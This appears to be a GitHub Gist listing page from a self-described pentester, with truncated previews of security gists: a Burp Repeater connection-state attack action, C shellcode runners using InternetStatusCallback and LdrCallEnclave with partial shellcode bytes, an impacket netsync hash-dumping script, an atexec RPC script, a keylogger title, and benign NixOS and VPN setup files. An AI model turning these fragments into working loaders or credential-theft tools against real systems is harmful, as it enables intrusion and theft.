D@rkR4y. darkr4y

🎯

Self-Introspection

cyber sec enthusiast. now its time to pentest! ٩(•̤̀ᵕ•̤́๑)

albinowax / connection-state-attack.bambda

Created October 16, 2025 13:24

Connection state attack Custom Action for Burp Repeater

	// For context check out https://portswigger.net/web-security/host-header/exploiting#connection-state-attacks
	var connectionId = utilities().randomUtils().randomString(8);
	var options = RequestOptions.requestOptions().withConnectionId(connectionId).withHttpMode(HttpMode.HTTP_1);

	// Send a simple GET / HTTP/1.1 to the target as the precusor request
	var url = requestResponse.request().url();
	var precursorRequest = HttpRequest.httpRequestFromUrl(url);
	precursorRequest = precursorRequest.withPath("/").withHeader("Connection", "keep-alive");

	// Send the attack in the repeater, and update the response pane

whokilleddb / JasonToddIsTheBestRobin.c

Created August 21, 2025 22:51

Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()

	#include <windows.h>
	#include <wininet.h>
	#include <stdio.h>

	#pragma comment(lib, "wininet.lib")

	// notepad.exe shellcode
	char shellcode[] = {
	0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
	0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,

whokilleddb / enclave.c

Created August 3, 2025 21:35

Run shellcode using LdrCallEnclave

	#include <stdio.h>
	#include <windows.h>

	// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
	// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll

	EXTERN_C NTSYSAPI
	NTSTATUS
	NTAPI LdrCallEnclave(
	_In_ PENCLAVE_ROUTINE Routine,

hemashushu / configuration.nix

Created May 5, 2025 15:05

NixOS configuration reference 2025-05

	# Edit this configuration file to define what should be installed on
	# your system. Help is available in the configuration.nix(5) man page
	# and in the NixOS manual (accessible by running ‘nixos-help’).

	{ config, pkgs, lib, ... }:

	{
	imports = [
	# Include the results of the hardware scan.
	./hardware-configuration.nix

ThePirateWhoSmellsOfSunflowers / netdumper.py

Last active July 1, 2025 14:39

This script perform a netsync attack. No SMB involved

	from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr
	from impacket.uuid import bin_to_uuidtup
	from impacket.crypto import SamDecryptNTLMHash
	from impacket.nt_errors import STATUS_MORE_ENTRIES
	from impacket.dcerpc.v5.rpcrt import DCERPCException
	from binascii import unhexlify, hexlify
	from random import randbytes
	import sys
	import argparse

freefirex / setup.sh

Created February 14, 2025 19:18

softether vpn setup script

	#!/bin/bash

	if [ $(id -u) -ne 0 ]; then
	echo "This script must be run as root"
	exit
	fi

	# Function to prompt for input and ensure it's not blank (except for domain)
	prompt_input() {
	local var_name="$1"

devanshbatham / GitHub-Actions-Attack-Vectors.md

Last active March 15, 2025 21:41

GitHub Actions Attack Vectors

Security Issue	Trigger

x86matthew / keylogger.cpp

Created January 16, 2025 12:03

olafhartong / GetTracelogProviderSecurity.ps1

Created January 3, 2025 14:08

	### USAGE:
	###
	### GetTracelogProviderSecurity.ps1 (to get all provider info)
	###
	### GetTracelogProviderSecurity.ps1 -ProviderName f2e68291-2367-5d51-3488-46f7a0e3f2cf
	### (to get the info for 1 provider guid)
	##
	#
	# Provider: f2e68291-2367-5d51-3488-46f7a0e3f2cf
	# Control Flags: 45076

ThePirateWhoSmellsOfSunflowers / atexec_rpc.py

Last active August 15, 2025 12:15

	#!/usr/bin/env python
	# Impacket - Collection of Python classes for working with network protocols.
	#
	# Copyright Fortra, LLC and its affiliated companies
	#
	# All rights reserved.
	#
	# This software is provided under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.